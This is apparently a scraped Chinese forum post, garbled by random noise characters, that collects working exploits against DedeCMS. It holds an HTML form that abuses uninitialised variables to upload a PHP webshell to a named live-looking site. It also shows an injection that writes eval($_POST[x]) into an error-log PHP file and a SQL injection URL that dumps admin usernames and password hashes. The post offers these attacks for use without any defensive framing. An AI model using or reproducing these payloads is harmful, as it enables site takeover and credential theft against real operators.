. v# i1 @, P' b7 Y6 n
7 v! Z* d, d6 a) [" L! ^6 t: r6 p% F) }7 w. W7 Y
% r  v) V% Y2 [' ]  v" c
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
/ V; e, g  b' Q/ ?  f( Z<html>1 M# w. Z5 q6 K. b
<head>
6 ?  D6 Z  s5 b<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
" h& o, F" ~8 q9 y, d0 \( g' I, [& b</head>- t& d' P5 M  \, I7 U4 Q
<body style="FONT-SIZE: 9pt">
+ c- T1 ?9 Z. `, g! [  b4 B1 w---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />5 a7 x. K# e- x/ p* m
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>5 g! H9 x  Q, W% ^0 i
<input type='hidden' name='activepath' value='/data/cache/' />! H7 P( J: c7 a/ M2 J% \
<input type='hidden' name='cfg_basedir' value='../../' />- r4 ?+ m3 [* _/ d2 n+ ^
<input type='hidden' name='cfg_imgtype' value='php' />! `% Y3 ?6 J& Z  D# h; E4 }" S
<input type='hidden' name='cfg_not_allowall' value='txt' />
3 `; s% \2 o0 r9 ?. s3 X2 T<input type='hidden' name='cfg_softtype' value='php' />
; u. k% N, @7 Q/ P. Z. j' q<input type='hidden' name='cfg_mediatype' value='php' />
$ ?1 O8 d# \' j; ~0 k<input type='hidden' name='f' value='form1.enclosure' />
& Y, f2 ]( s- L7 B/ [/ b<input type='hidden' name='job' value='upload' />3 `% u! V$ G/ ]
<input type='hidden' name='newname' value='fly.php' />' l0 Y6 h! c3 b" B2 l1 W& V( j
Select U Shell <input type='file' name='uploadfile' size='25' />) l: D! j8 W; e2 z) }
<input type='submit' name='sb1' value='确定' />
5 m, F9 m& Z9 E% z6 \8 A4 A</form>
, u! `8 s8 h% G, l3 W+ }  @<br />It's just a exp for the bug of Dedecms V55...<br />% d9 Z& Z7 K  Z* E3 E% c
Need register_globals = on...<br />6 x) E! O' Y( p/ o& k
Fun the game,get a webshell at /data/cache/fly.php...<br />
. K2 u$ ?  S; P) E8 h. n5 Q</body>
, |$ T, }) M; l( ~, X</html>
0 C6 B" }2 o$ {* J  @+ t9 ^2 J6 P" C1 r9 |  U) T, Z+ Y
% J# k" Q' e' _2 j8 l- T/ r

/ V) [$ o# ~: r, E9 c3 p1 l, x' d4 m+ R
6 A0 d/ T! `8 m

0 f3 w, [0 C- d; h: j( }6 i7 G% N9 E- G' B% x8 p) }

7 a( ]1 t& E# k, z  F) R
. [1 `+ H$ q, v8 p# A' T
9 C. g0 {/ I* k织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
. s9 ?7 `/ m( Z! J3 m. O4 ~利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。* ?, G( b* G0 d8 s
1. 访问网址:: C# q* W& F% a! Y4 ~5 [2 }
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
9 L+ W' M4 U& I# |3 i& F可看见错误信息) h( L9 I( C' Z$ k) w

1 ]  J7 F% }. C0 f9 p0 q' u
; _( @1 @+ }. G3 x  j+ K. j& f* T2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
' ?+ t7 f$ D( I: ]int(3) Error: Illegal double '1024e1024' value found during parsing1 q3 P7 m# i- Z9 j; d
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
2 _1 b3 }* b8 O) t) d# Q" g# \; y2 W( D0 ]2 {+ [! L
) u0 b; G! M( U/ w( d9 g
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
, [1 x  S5 @! Y8 x' [$ [) d% f/ i4 Q' o1 r" R% V

6 l8 F/ @5 j. g: n8 f<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>. l% e/ S  @3 L$ a& b

# D+ g! B. p4 i
2 `4 I9 y( N1 `% r7 H! t- C% e按确定后的看到第2步骤的信息表示文件木马上传成功.: v, W2 V* k+ ^) _
( I% e. U% O& z. g
7 V) b1 d( F! X( ]* X4 o/ L" L
$ t$ b9 C9 a5 |# A! v* e

& l' I9 @0 n8 V+ ]# p5 S; Z# V
7 l; J5 S* k7 a; H* m+ r) E1 _5 X% J

5 O7 m2 K0 J9 i) j" o" a& J* w7 E3 [
5 R) t3 a# ~) p$ ~3 Q
' D3 u7 ?3 g  c6 L# h7 {. o8 r8 G/ G
* f8 j# h! F$ O+ G) k" G3 O0 y
% C  C# V0 S8 a0 v8 W
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
& V2 X2 P) t4 F, z' P" thttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表